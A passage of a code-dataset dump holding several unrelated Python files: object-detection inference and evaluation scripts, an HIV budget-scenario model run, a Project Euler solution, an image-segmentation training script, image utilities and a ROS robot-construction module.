to positions relative to the crop\n                box_update_i[3][0] = box_update_i[3][0] - cut_box[2]\n                box_update_i[3][2] = box_update_i[3][2] - cut_box[2]\n                box_update_i[3][1] = box_update_i[3][1] - cut_box[0]\n                box_update_i[3][3] = box_update_i[3][3] - cut_box[0]\n            after_process_result.append([result[class_i],cut_img])\n        else:\n            cut_box = (min_top-C.Cut_Pixel, max_down+C.Cut_Pixel, min_left, w)\n            cut_img = img[cut_box[0]:cut_box[1], cut_box[2]:cut_box[3]]\n            for box_update_i in result[class_i]:\n                # update the yolo boxes to positions relative to the crop\n                box_update_i[3][0] = box_update_i[3][0] - cut_box[2]\n                box_update_i[3][2] = box_update_i[3][2] - cut_box[2]\n                box_update_i[3][1] = box_update_i[3][1] - cut_box[0]\n                box_update_i[3][3] = box_update_i[3][3] - cut_box[0]\n            after_process_result.append([result[class_i], cut_img])\n\n        # cv2.imwrite(str(class_i)+basename, cut_img)\n\n    return (image_path,after_process_result)\n\n\ndef after_process_ctpn(ctpn, image_path, result):\n    '''\n    CTPN processing\n    :param after_process_result:\n    :return:\n    '''\n\n    # import pickle\n    # import ctpn_predict\n    # with open('result.obj', 'rb') as config_f:\n    #     (image_path, result) = pickle.load(config_f)\n    # ctpn = ctpn_predict.id_card_word_position()\n\n    i = 3\n    basename = os.path.basename(image_path)\n\n    for pic_i in result:\n        # process each image separately\n        image = pic_i[1]\n        m_img_copy = image.copy()\n\n        (h, w, c) = image.shape\n\n        info = pic_i[0]\n        title_box = []\n        title_classname = []\n        title_score = []\n        for info_i in info:\n            title_box.append(info_i[3])\n            title_classname.append(info_i[1])\n            title_score.append(info_i[2])\n\n            # cv2.rectangle(m_img_copy, (info_i[3][0], info_i[3][1]),\n            #               (info_i[3][2], info_i[3][3]), (0, 255, 0), 2)\n\n        title_box_np = np.array(title_box)\n        min_right = title_box_np.min(axis=0)[2]\n\n        cut_y_min = 0\n        cut_y_max = h\n        cut_x_min = min_right + 1\n        cut_x_max = w\n        image_cut = image[cut_y_min:cut_y_max, cut_x_min:cut_x_max]\n        # call the CTPN prediction function\n        boxes, m_img, scale = ctpn.predict_zhizhao(GetRedC(image_cut))\n\n        ctpn_boxes = []\n        for box in boxes:\n            
print(box)\n x1 = int(box[0] / scale)\n y1 = int(box[1] / scale)\n x2 = int(box[2] / scale)\n y2 = int(box[3] / scale)\n x1 = x1 + cut_x_min\n x2 = x2 + cut_x_min\n\n # print('yolo')\n # print(scale)\n # print(m_img_copy.shape)\n # print([x1,y1,x2,y2])\n\n ctpn_boxes.append([x1,y1,x2,y2])\n # cv2.rectangle(m_img_copy, (x1, y1),\n # (x2, y2), (0, 0, 255), 3)\n\n ## 算法: 近邻box\n\n print(title_box,ctpn_boxes)\n title_box, ctpn_boxes,ctpn_boxes_best_choose,ctpn_boxes_good_choose = idokonw(title_box,ctpn_boxes,title_classname)\n\n colors = [(0, 0, 255),(0, 255, 255),(0, 255, 0),(255, 0, 0),(255, 255, 0),(255, 255, 255)]\n for box_i,box in enumerate(title_box):\n cv2.rectangle(m_img_copy, (box[0], box[1]),\n (box[2], box[3]), colors[box_i], 3)\n if ctpn_boxes_best_choose[box_i][0] != -1:\n box = ctpn_boxes[int(ctpn_boxes_best_choose[box_i][0])]\n cv2.rectangle(m_img_copy, (box[0], box[1]),\n (box[2], box[3]), colors[box_i], 3)\n if ctpn_boxes_good_choose[box_i][0] != -1:\n box = ctpn_boxes[int(ctpn_boxes_good_choose[box_i][0])]\n cv2.rectangle(m_img_copy, (box[0], box[1]),\n (box[2], box[3]), colors[box_i], 1)\n # for box in ctpn_boxes:\n # cv2.rectangle(m_img_copy, (box[0], box[1]),\n # (box[2], box[3]), (0, 255, 0), 3)\n\n pass\n\n\n cv2.imwrite(str(i) +'_ctpn_' + basename, m_img_copy)\n i = i + 1\n\n\n\ndef get_path_list(rootdir):\n '''\n :return: self.FilePathList\n '''\n FilePathList = []\n for fpathe, dirs, fs in os.walk(rootdir):\n for f in fs:\n FilePath = os.path.join(fpathe, f)\n if os.path.isfile(FilePath):\n FilePathList.append(FilePath)\n return FilePathList\n\n###################################################### test\n\ndef detect_img_for_test():\n yolo = YOLO3()\n img_path = r'./hard/201811056769216300000000000002-05M_0.jpg'\n image = Image.open(img_path)\n (image_path, result) = yolo.predict(image,image_path=img_path)\n after_process(image_path, result)\n print(result)\n # r_image = yolo.detect_image(image)\n yolo.close_session()\n # r_image.save('1.png')\n\n# 检查yolo3 模型效果\ndef detect_img_for_batch():\n yolo = YOLO3()\n FileList = get_path_list('./hard')\n for f in FileList:\n image = Image.open(f)\n r_image = yolo.detect_image(image)\n basename = os.path.basename(f)\n r_image.save('./result_data/' + basename)\n yolo.close_session()\n\ndef detect_img_for_batch_predict():\n yolo = YOLO3()\n ctpn = ctpn_predict.id_card_word_position()\n\n FileList = get_path_list(r'C:\\004_project\\012-yolo\\ZZ_Dection\\test_data')\n for f in FileList:\n print('handle' + f)\n image = Image.open(f)\n (image_path, result) = yolo.predict(image, image_path=f)\n # 单链接聚类\n (image_path, after_process_result) = after_process(image_path, result)\n # bbox dist\n after_process_ctpn(ctpn, image_path, after_process_result)\n\n yolo.close_session()\n\n\ndef predict_img():\n yolo = YOLO3()\n img_path = r'./test_data/201811059637005600000000000001-07M_0.jpg'\n image = Image.open(img_path)\n (image_path, result) = yolo.predict(image,image_path=img_path)\n\n yolo.close_session()\n\n # r_image.save('1.png')\n\n\n\n\nif __name__ == '__main__':\n # predict_img()\n # detect_img_for_test()\n # detect_img_for_batch()\n detect_img_for_batch_predict()\n # after_process_ctpn()\n # import pickle\n # with open('result.obj', 'rb') as config_f:\n # (image_path, result) = pickle.load(config_f)\n # print(result)\n #\n # after_process(image_path, result)\n\n 
pass\n\n\n\n\n\n\n\n\n\n","sub_path":"yolo3_predict_v1.py","file_name":"yolo3_predict_v1.py","file_ext":"py","file_size_in_byte":17305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"540123223","text":"\"\"\"\nRUNBUDGET\n\nRun a single budget.\n\"\"\"\n\n\nimport sys; sys.path.append('/u/cliffk/unsw/optima/server/src/sim')\nfrom optimize import runmodelalloc\nfrom copy import deepcopy\nfrom dataio import loaddata\nfrom utils import findinds\nfrom numpy import arange\nfrom gatherplotdata import gathermultidata\nfrom viewresults import viewmultiresults\nfrom timevarying import timevarying\nfrom matplotlib.pylab import subplot, pie, figure, array\nimport colorbrewer\n\nsys.path.append(r'C:\\Users\\Rgray\\Documents\\Research\\!Optima_Development\\optimamodel\\Optima\\server\\src\\sim')\norigfile = r'C:\\Users\\Rgray\\Google Drive\\Shared Projects\\analyses-data\\Indonesia\\projects\\Indonesia2015workshop-GF2.json'\nnewfile = r'C:\\Users\\Rgray\\Google Drive\\Shared Projects\\analyses-data\\Indonesia\\projects\\Indonesia2015workshop-scenarios.json'\n\noutfilename = r'C:\\Users\\Rgray\\Google Drive\\Shared Projects\\analyses-data\\Indonesia\\output\\scenariosGF'\n\n## Set parameters\nverbose = 8\nntimepm = 1 # AS: Just use 1 or 2 parameters... using 3 or 4 can cause problems that I'm yet to investigate\nrandseed = 0\nstart = 2015\nend = 2030\ndoplot = False\ndosaveCliff = False\ndosave = True\n\n\nD = loaddata(origfile)\ninitialindex = findinds(D['opt']['partvec'], start)\nfinalparindex = findinds(D['opt']['partvec'], end)\nparindices = arange(initialindex,finalparindex)\n\n# Specify programs and budgets\nprognames = [u'Condoms and BCC (P)', u'FSW programs (P)', u'MSM programs (P)', \nu'OST', u'NSP (NP)', u'ART', u'PMTCT', u'MGMT', u'M&E', u'Other', u'HTC (P)', \nu'HTC (NP)', u'Condoms and BCC (NP)', u'FSW programs (NP)', u'MSM programs (NP)']\nallocOrig = [1.27835818e+06, 4.48478110e+05, 9.94186776e+05,\n 1.66444510e+05, 5.28590039e+06, 3.11815379e+07,\n 1.23095012e+05, 1.60732203e+07, 1.19850462e+07,\n 3.76615980e+06, 1.16737956e+03, 7.67168093e+04,\n 6.24139582e+06, 2.18962842e+06, 4.85397073e+06]\nallocNoGF = [0, 0, 0,\n 0, 0, 3.11815379e+07,\n 0, 1.60732203e+07, 1.19850462e+07,\n 3.76615980e+06, 0, 0,\n 0, 0, 0] \nallocGF = [0, 915876, 1047422,\n 65395, 2076806, 38304235,\n 620027, 24920965, 13643745,\n 7258367, 0, 0,\n 0, 4471631, 5113884]\nallocGFextra = [0, 1492224, 1440046,\n 82467, 2618967, 43728628,\n 1820070, 25215654, 13887271,\n 7985905, 0, 0,\n 0, 7285566, 7030815]\n\nif doplot:\n bmap = colorbrewer.get_map('Paired', 'Qualitative', len(prognames)) # WARNING, won't work with >13\n colors = bmap.mpl_colors\n figure(figsize=(12,6))\n subplot(1,2,1)\n pie(alloc2018, labels=prognames, colors=colors)\n subplot(1,2,2)\n pie(newalloc, labels=prognames, colors=colors)\n\nallocs = [allocOrig, allocNoGF, allocGF, allocGFextra]\nfor i,alloc in enumerate(allocs):\n allocs[i] = timevarying(alloc, ntimepm=1, nprogs=len(allocOrig), tvec=D['opt']['partvec'], totalspend=sum(alloc)) \n\n\nlabels = ['allocOrig', 'allocNoGF','allocGF','allocGFextra']\nresult = dict()\nresult['Rarr'] = []\nfor thisalloc in allocs:\n R = runmodelalloc(D, thisalloc, allocOrig, parindices, randseed, rerunfinancial=False, verbose=2)\n result['kind'] = 'money'\n result['Rarr'].append(dict()) # Append a structure\n result['Rarr'][-1]['R'] = deepcopy(R) # Store the R structure (results)\n result['Rarr'][-1]['label'] = labels.pop(0) # Store labels, one at a 
time\n\n\nmulti = gathermultidata(D, result['Rarr'])\nif doplot: viewmultiresults(multi)\n\nprint('\\nOriginal/new total:')\nprint(sum(allocOrig))\nprint(sum(allocNoGF))\nprint(sum(allocGF))\nprint(sum(allocGFextra))\n\nprint('\\nOriginal/new deaths in 2020:')\nprint(multi['death']['tot']['best'][0][20])\nprint(multi['death']['tot']['best'][1][20])\n\n# Cliff's version of save\nif dosaveCliff:\n from gatherplotdata import gatheroptimdata\n from optimize import saveoptimization, defaultobjectives, defaultconstraints\n from dataio import savedata\n objectives = defaultobjectives(D)\n constraints = defaultconstraints(D)\n D.pop('optimizations')\n D['plot'].pop('optim')\n \n ## Gather plot data\n plot_result = gatheroptimdata(D, result, verbose=verbose)\n if 'optim' not in D['plot']: D['plot']['optim'] = [] # Initialize list if required\n D['plot']['optim'].append(plot_result) # In any case, append\n \n result_to_save = {'plot': [plot_result]}\n\n ## Save optimization to D\n D = saveoptimization(D, 'Minimize money: NSP', objectives, constraints, result_to_save, verbose=2)\n savedata(newfile, D)\n\n# My version of save \nimport pandas as pd\nfrom pandas import Series, ExcelWriter\nif dosave:\n # Now extract and save the results we are interested in as a dataframe in a CSV file\n programs = Series(prognames)\n curr_alloc = Series(allocOrig)\n no_gf = Series(allocNoGF)\n with_gf = Series(allocGF)\n with_gf_extra = Series(allocGFextra)\n \n # Infections\n curr_newinfects = Series(multi['inci']['tot']['best'][0])\n no_gf_newinfects = Series(multi['inci']['tot']['best'][1])\n gf_newinfects = Series(multi['inci']['tot']['best'][2])\n gfextra_newinfects = Series(multi['inci']['tot']['best'][3])\n \n # Deaths\n curr_deaths = Series(multi['death']['tot']['best'][0])\n no_gf_deaths = Series(multi['death']['tot']['best'][1])\n gf_deaths = Series(multi['death']['tot']['best'][2]) \n gfextra_deaths = Series(multi['death']['tot']['best'][3])\n \n # Create data frame \n Dfalloc = pd.concat({'Programs': programs, 'Current_Allocation': curr_alloc, 'No_Global_Fund': no_gf,\n 'With_Global_Fund':with_gf,'With_Extra':with_gf_extra}, axis = 1) \n \n Dfinfects = pd.concat({'current_infections': curr_newinfects,'No_GF_infections': no_gf_newinfects,\n 'GF_infections': gf_newinfects,'Extra_infections': gfextra_newinfects}, axis = 1) \n \n Dfdeaths = pd.concat({'current_deaths': curr_deaths,'No_GF_deaths': no_gf_deaths,\n 'GF_deaths': gf_deaths,'Extra_deaths': gfextra_deaths}, axis = 1)\n \n # Put results in an Excel file as well for quick viewing\n \n writer = ExcelWriter(outfilename+'.xlsx') \n Dfalloc.to_excel(writer,'Sheet1')\n Dfinfects.to_excel(writer,'Sheet2')\n Dfdeaths.to_excel(writer,'Sheet3')\n writer.save()\n printv('..result files created', 3, verbose)\n\nprint('\\n\\n\\nDONE.')\n\n","sub_path":"indonesia/runbudget.py","file_name":"runbudget.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"119652197","text":"\"\"\"\nCOCO-Style Evaluations\n\"\"\"\nimport argparse\nimport torch\nimport yaml\nfrom tqdm import tqdm\nfrom model.efficientdet.backbone import EfficientDetBackbone\nfrom model.efficientdet.utils import BBoxTransform, ClipBoxes\nfrom utils import postprocess, boolean_string\nfrom dataloader.freicar_dataloader import FreiCarDataset\nfrom model.efficientdet.dataset import collater\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport matplotlib.pyplot as 
plt\n########################################################################\n# Object Detection model evaluation script\n# Modified by: Jannik Zuern (zuern@informatik.uni-freiburg.de)\n########################################################################\ndef metrics(predictions: np.ndarray, labels: np.ndarray, iou_threshold: float):\n    # The sum is used to identify a ground truth with no bounding box.\n    sum = np.sum(labels)\n    ious = []\n    FP = 0\n    TP = 0\n    FN = 0\n    # False positive case\n    if sum == -5:\n        FP = 1 * len(predictions)\n    # False Negative case\n    elif len(predictions) == 0:\n        FN = len(labels)\n        ious = [0] * len(labels)\n    else:\n        if len(labels) < len(predictions):\n            # These are spurious extra boxes\n            FP = len(predictions) - len(labels)\n            ious = [0] * len(labels)\n            for i in range(len(labels)):\n                compare_iou = []\n                # We compute the IoU of each ground truth w.r.t. every predicted bounding box and select the best one.\n                # This logic makes sure we cope with the prediction order not being in accordance with the ground-truth order when there are multiple objects.\n                for j in range(len(predictions)):\n                    intersection = (min(predictions[j][2], labels[i][2]) - max(predictions[j][0], labels[i][0])) * \\\n                                   (min(predictions[j][3], labels[i][3]) - max(predictions[j][1], labels[i][1]))\n                    union = ((predictions[j][2] - predictions[j][0]) * (predictions[j][3] - predictions[j][1])) + (\n                            (labels[i][2] - labels[i][0]) *\n                            (labels[i][3] - labels[i][1])) - intersection\n                    compare_iou.append(intersection / union)\n                ious[i] = np.max(compare_iou)\n        else:\n            ious = [0] * len(labels)\n            for j in range(len(predictions)):\n                compare_iou = []\n                # We compute the IoU of each ground truth w.r.t. every predicted bounding box and select the best one.\n                # This logic makes sure we cope with the prediction order not being in accordance with the ground-truth order when there are multiple objects.\n                for i in range(len(labels)):\n                    intersection = (min(predictions[j][2], labels[i][2]) - max(predictions[j][0], labels[i][0])) * \\\n                                   (min(predictions[j][3], labels[i][3]) - max(predictions[j][1], labels[i][1]))\n                    union = ((predictions[j][2] - predictions[j][0]) * (predictions[j][3] - predictions[j][1])) + (\n                            (labels[i][2] - labels[i][0]) *\n                            (labels[i][3] - labels[i][1])) - intersection\n                    compare_iou.append(intersection / union)\n                ious[j] = np.max(compare_iou)\n    for iou in ious:\n        # There is a box, but we discard it because of the threshold. 
Hence we add it to FN\n if iou < iou_threshold:\n FN += 1\n else:\n TP += 1\n return {\n \"ious\": ious,\n \"tp\": TP,\n \"fp\": FP,\n \"fn\": FN\n }\nap = argparse.ArgumentParser()\nap.add_argument('-p', '--project', type=str, default='freicar-detection', help='project file that contains parameters')\nap.add_argument('-c', '--compound_coef', type=int, default=0, help='coefficients of efficientdet')\nap.add_argument('-w', '--weights', type=str, default=None, help='/path/to/weights')\nap.add_argument('--nms_threshold', type=float, default=0.5, help='nms threshold, don\\'t change it if not for testing purposes')\nap.add_argument('--cuda', type=boolean_string, default=True)\nap.add_argument('--device', type=int, default=0)\nargs = ap.parse_args()\ncompound_coef = args.compound_coef\nnms_threshold = args.nms_threshold\nuse_cuda = args.cuda\ngpu = args.device\nproject_name = args.project\nweights_path = args.weights\nparams = yaml.safe_load(open(f'projects/{project_name}.yml'))\nobj_list = params['obj_list']\nthreshold = 0.2\niou_threshold = 0.2\nif __name__ == '__main__':\n '''\n Note: \n When calling the model forward function on an image, the model returns\n features, regression, classification and anchors.\n In order to obtain the final bounding boxes from these predictions, they need to be postprocessed\n (this performs score-filtering and non-maximum suppression)\n Thus, you should call\n regressBoxes = BBoxTransform()\n clipBoxes = ClipBoxes()\n preds = postprocess(imgs, anchors, regression, classification, regressBoxes, clipBoxes, threshold, nms_threshold) \n preds = preds[0]\n Now, the scores, class_indices and bounding boxes are saved as fields in the preds dict and can be used for subsequent evaluation.\n '''\n set_name = 'validation'\n freicar_dataset = FreiCarDataset(data_dir=\"./dataloader/data/\",\n padding=(0, 0, 12, 12),\n split=set_name,\n load_real=False)\n val_params = {'batch_size': 1,\n 'shuffle': False,\n 'drop_last': True,\n 'collate_fn': collater,\n 'num_workers': 1}\n freicar_generator = DataLoader(freicar_dataset, **val_params)\n # instantiate model\n model = EfficientDetBackbone(compound_coef=compound_coef,\n num_classes=len(obj_list),\n ratios=eval(params['anchors_ratios']),\n scales=eval(params['anchors_scales']))\n # load model weights file from disk\n model.load_state_dict(torch.load(weights_path, map_location=torch.device('cpu')))\n ##########################################\n # TODO: implement me!\n precision_list = []\n recall_list = []\n miou_list = []\n for j in range(0, 11):\n threshold = j * 0.1\n print(\"===================================\")\n print(threshold)\n model.eval()\n ious = []\n progress_bar = tqdm(freicar_generator)\n # when iou threshold = 1 false -ve and true +ve will be equal to zero we get divide by zero error so we are setting TP =1 as default.\n TP = 1\n FN = 0\n FP = 0\n for i, data in enumerate(progress_bar):\n with torch.no_grad():\n try:\n inputs = data['img'].float()\n labels = data['annot']\n features, regression, classification, anchors = model(inputs)\n regressBoxes = BBoxTransform()\n clipBoxes = ClipBoxes()\n preds = postprocess(inputs, anchors, regression, classification, regressBoxes, clipBoxes, threshold,\n nms_threshold)\n #print(labels)\n preds = preds[0]\n #print(preds)\n labels = torch.squeeze(labels)\n data = metrics(preds['rois'].reshape(-1, 4), labels.cpu().detach().numpy().reshape(-1, 5), iou_threshold)\n #print(data)\n ious += data['ious']\n TP += data['tp']\n FP += data['fp']\n FN += data['fn']\n #TP, TN, FP, FN = 
confusion_matrix(preds['rois'].reshape(-1,4), labels.cpu().detach().numpy().reshape(-1, 5), miou)\n except Exception as e:\n print(e)\n miou = np.mean(ious)\n print(\"miou : \", miou)\n precision = TP / (TP + FP)\n print(\"True positive: \", TP)\n print(\"FalsePositive: \", FP)\n print(\"False Negative: \", FN)\n print(\"Precision: \", precision)\n recall = TP / (TP + FN)\n print(\"recall : \", recall)\n precision_list.append(precision)\n recall_list.append(recall)\n miou_list.append(miou)\n ##########################################\nprecision_list = [precision_list[i] for i in np.argsort(recall_list)[::-1]]\nrecall_list = [recall_list[i] for i in np.argsort(recall_list)[::-1]]\nplt.plot([recall_list[i] for i in np.argsort(precision_list)[::-1]], [precision_list[i] for i in np.argsort(precision_list)[::-1]])\nplt.title(\"PR curve plot\")\nplt.xlabel(\"recall\")\nplt.ylabel(\"precision\")\nplt.grid()\nplt.savefig(\"precision recall curve.png\")\nprint(\"miou:\")\nprint(miou)\nprint(\"recall:\")\nprint(recall_list)\nprint(\"precision\")\nprint(precision_list)\naoc = 0\nfor i in range(len(recall_list)-1):\n aoc += ((recall_list[i] - recall_list[i+1]) * precision_list[i])\nprint(\"map: \", aoc)","sub_path":"ros_code/02-01-object-detection-exercise/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"38432760","text":"# Problem 121.py\r\n# \"Disc game prize fund\"\r\n#\r\n# Result - 2269\r\n#\r\n# Changelog:\r\n# 05.01.2017 - Script created\r\n\r\nfrom common import *\r\nfrom fractions import Fraction\r\n\r\nn_max = 15\r\nn_blue = [1]\r\n\r\nfor n in range(1, 1 + n_max):\r\n blue_prob = Fraction(1, 1 + n)\r\n new_n_blue = [Fraction(0, 1)]\r\n for i in n_blue:\r\n new_n_blue[-1] += i * (1 - blue_prob)\r\n new_n_blue.append(i * blue_prob)\r\n n_blue = new_n_blue\r\n\r\nresult = int(1/sum(n_blue[-n_max//2:]))\r\n\r\nprint_result(result)\r\n","sub_path":"Project Euler/Problem 121.py","file_name":"Problem 121.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"18081005","text":"import sys, os, numpy as np\nfrom PIL import Image, ImageDraw\nfrom crfrnn_model import get_crfrnn_model_def\nimport util\nfrom keras.utils import to_categorical\nfrom keras import metrics\n\nGenImSize = 128\nFitImSize = 500\n\ndef MakeCellImage(x, y, r, i):\n im = Image.new(mode='F', size=(GenImSize, GenImSize))\n draw = ImageDraw.Draw(im)\n draw.ellipse(xy=[x-r, y-r, x+r, y+r], fill='White')\n im = np.array(im).astype(np.float32)\n im *= (i / 255.0)\n return im\n\ndef MakeRandomCellImage(n):\n\tim = np.zeros(shape=(GenImSize, GenImSize))\n\tfor i in range(n):\n\t\tradius = np.random.randint(low=-5, high=10) + 10\n\t\tintensity = (np.random.randn() * 0.1) + 0.5\n\t\tintensity = max(min(intensity, 1.0), 0.0)\n\t\tposition = np.random.randint(low=radius, high=GenImSize-radius, size=2)\n\t\tim += MakeCellImage(position[0], position[1], radius, intensity)\n\t\t\n\tim_rand = im + (np.random.randn(im.shape[0], im.shape[1]) * 0.1) + 0.2\n\tim_rand[im_rand < 0] = 0\n\tim_rand[im_rand > 1] = 1\n\tim[im > 0] = 1\n\tim[im < 1] = 0\n\treturn im, im_rand\n\ndef MakeInputData(n, nBatch=64):\n\tim = np.zeros(shape=(FitImSize, FitImSize, nBatch))\n\tim_rand = np.zeros(shape=(FitImSize, FitImSize, 1, nBatch))\n\tfor i in range(nBatch):\n\t\tim_, im_rand_ = MakeRandomCellImage(n)\n\t\tim_ = 
Image.fromarray(im_)\n\t\tim_rand_ = Image.fromarray(im_rand_)\n\t\tim_rand_ = im_rand_.resize((FitImSize, FitImSize), Image.ANTIALIAS)\n\t\tim_ = im_.resize((FitImSize, FitImSize), Image.NEAREST)\n\t\tim_ = np.array(im_)\n\t\tim_rand_ = np.array(im_rand_)\n\t\tim_rand_ = im_rand_.astype(np.float32)\n\t\tim_rand_ -= np.mean(im_rand_.flatten())\n\t\tim_rand_ /= np.std(im_rand_.flatten())\n\n\t\tim_rand[:, :, 0, i] = im_rand_\n\t\tim[:, :, i] = im_\n\n\tim = to_categorical(im.transpose((2, 0, 1)), num_classes=2)\n\n\treturn im, im_rand.transpose((3, 0, 1, 2))\n\n\nepochesPerInput = 25\nnInputs = 40\nsaved_model_path = \"SegmentationModel_Weights.h5\"\n\nmodel = get_crfrnn_model_def()\n#model.load_weights(saved_model_path)\nmodel.compile(loss='binary_crossentropy', optimizer='adadelta', metrics=[metrics.binary_accuracy])\n\nfor i in range(nInputs):\n\tprint(\"---\\n---\")\n\tprint(\"Iteration {}/{}\".format(i+1, nInputs))\n\tprint(\"---\\n---\")\n\t\n\tlabels, im = MakeInputData(n=np.random.randint(low=1, high=5))\n\n\tmodel.fit(im, labels, batch_size=1,\n epochs=epochesPerInput, validation_split=0.05)\n\tmodel.save_weights(saved_model_path)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"253094330","text":"\n# @Title: 罗马数字转整数 (Roman to Integer)\n# @Author: allan.wanglz@qq.com\n# @Date: 2020-06-18 22:20:31\n# @Runtime: 68 ms\n# @Memory: 13.8 MB\n\nclass Solution:\n def romanToInt(self, s: str) -> int:\n dict={'I':1,'V':5,'X':10,'L':50,'C':100,'D':500,'M':1000,'IV':-2,'IX':-2,'XL':-20,'XC':-20,'CD':-200,'CM':-200}\n sum=0\n for k in range (len(s)-1):\n sum=sum+dict[s[k]]\n if (s[k]+s[k+1] in dict):\n sum=sum+dict[s[k]+s[k+1]]\n sum=sum+dict[s[-1]]\n return sum\n","sub_path":"Problemset/roman-to-integer/roman-to-integer.py","file_name":"roman-to-integer.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"227308820","text":"import numpy as np\nimport scipy\nimport scipy.ndimage\nimport scipy.misc\nimport numpy.linalg as lin\n\ndef load(filename):\n\timage = scipy.ndimage.imread(filename)\n\treturn image\n\t\ndef save(filename, data):\n\tscipy.misc.imsave(filename, data)\n\t\ndef sample(map, coords):\n\t\n\ttake = map\n\tfor axis in range(0, len(coords)):\n\t\tgood_coord = coords[axis]\n\t\tif good_coord < 0:\n\t\t\tgood_coord = 0;\n\t\tif good_coord >= map.shape[axis]:\n\t\t\tgood_coord = map.shape[axis] - 1\n\t\ttake = take[good_coord]\n\t\n\treturn take\n\t\ndef replace_colour(image, colour, new_colour):\n\n\tfor row in range(0, len(image)):\n\t\tfor col in range(0, len(image[row])):\n\t\t\tpx_colour = image[row][col]\n\t\t\t\n\t\t\t# The == operator is element-wise. Each comparison returns a bool;\n\t\t\t# The sum is thus the number that match. 
If all elements match, then \n# the colours are equal.\n\t\t\tif np.sum(px_colour == colour) == len(colour):\n\t\t\t\timage[row][col] = new_colour\n\n\t\ndef make_normal(bump, z_scale=1.0, pixelWidth=None):\n\tif len(bump.shape) >= 3:\n\t\tprint(\"Bump not grayscale\")\n\t\treturn None\n\t\n\tif pixelWidth is None:\n\t\tpixelWidth = 1.0 / bump.shape[0]\n\t\n\tmap = np.zeros(shape=(bump.shape[0], bump.shape[1], 3), dtype=np.uint8)\n\tfor row in range(0, bump.shape[0]):\n\t\tfor col in range(0, bump.shape[1]):\n\t\t\t\n\t\t\tA = [\n\t\t\t\t[-pixelWidth, -pixelWidth, 1],\n\t\t\t\t[0, -pixelWidth, 1],\n\t\t\t\t[pixelWidth, -pixelWidth, 1],\n\t\t\t\t[-pixelWidth, 0, 1],\n\t\t\t\t[0, 0, 1],\n\t\t\t\t[pixelWidth, 0, 1],\n\t\t\t\t[-pixelWidth, pixelWidth, 1],\n\t\t\t\t[0, pixelWidth, 1],\n\t\t\t\t[pixelWidth, pixelWidth, 1]]\n\t\t\tz = [\n\t\t\t\t[sample(bump, [row - 1, col - 1])],\n\t\t\t\t[sample(bump, [row, col - 1])],\n\t\t\t\t[sample(bump, [row + 1, col - 1])],\n\t\t\t\t[sample(bump, [row - 1, col])],\n\t\t\t\t[sample(bump, [row, col])],\n\t\t\t\t[sample(bump, [row + 1, col])],\n\t\t\t\t[sample(bump, [row - 1, col + 1])],\n\t\t\t\t[sample(bump, [row, col + 1])],\n\t\t\t\t[sample(bump, [row + 1, col + 1])]]\n\n\t\t\tz = np.array(z, dtype=np.float32)\n\t\t\tz = z / 255.0 * z_scale\n\t\t\t\t\n\t\t\t\n\t\t\tm, n, c = lin.lstsq(A, z)[0]\n\t\t\tnormal = (-n, -m, 1)\n\t\t\tnormal /= lin.norm(normal)\n\t\t\tnormal = normal / 2 + 0.5\n\t\t\t\n\t\t\tmap[row][col][0] = int(np.round(normal[0] * 255))\n\t\t\tmap[row][col][1] = int(np.round(normal[1] * 255))\n\t\t\tmap[row][col][2] = int(np.round(normal[2] * 255))\n\treturn map\n\t\t\t\n\t\t\t","sub_path":"ImageEdit/editimage.py","file_name":"editimage.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"529672959","text":"# System\nimport sys\n\n# ROS\nimport rospy\n\n# Robot skills\nfrom .robot import Robot\nfrom .amigo import Amigo\nfrom .hero import Hero\nfrom .mockbot import Mockbot\nfrom .sergio import Sergio\n\n\nROBOTS = {\n    \"amigo\": Amigo,\n    \"hero\": Hero,\n    \"mockbot\": Mockbot,\n    \"sergio\": Sergio\n}\n\n\ndef get_robot_from_argv(index, default_robot_name=\"hero\"):\n    \"\"\"\n    Construct a robot from the name given in the command line or from the default robot name.\n\n    :param index: Index in the command-line arguments where a robot name may be available.\n    :param default_robot_name: Name of the robot to use if the command line did not contain a name.\n    :return: The constructed robot.\n    :raise: RuntimeError if no robot could be created.\n    \"\"\"\n    if len(sys.argv) > index:\n        robot_name = sys.argv[index]\n    else:\n        robot_name = default_robot_name\n\n    return get_robot(robot_name)\n\n\ndef get_robot(name):\n    # type: (str) -> Robot\n    \"\"\"\n    Constructs a robot (api) object based on the provided name\n\n    :param name: (str) robot name\n    :return: (Robot)\n    :raises: RuntimeError\n    \"\"\"\n    rospy.loginfo(\"Constructing robot {}\".format(name))\n    robot_class = ROBOTS.get(name.lower())\n    if robot_class is not None:\n        return robot_class()\n    else:\n        raise RuntimeError(\"Don't know which robot to construct with name {}\".format(name))\n","sub_path":"robot_skills/src/robot_skills/get_robot.py","file_name":"get_robot.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"414012142","text":"from redis import Redis\nclient = Redis()\nfrom datetime import 
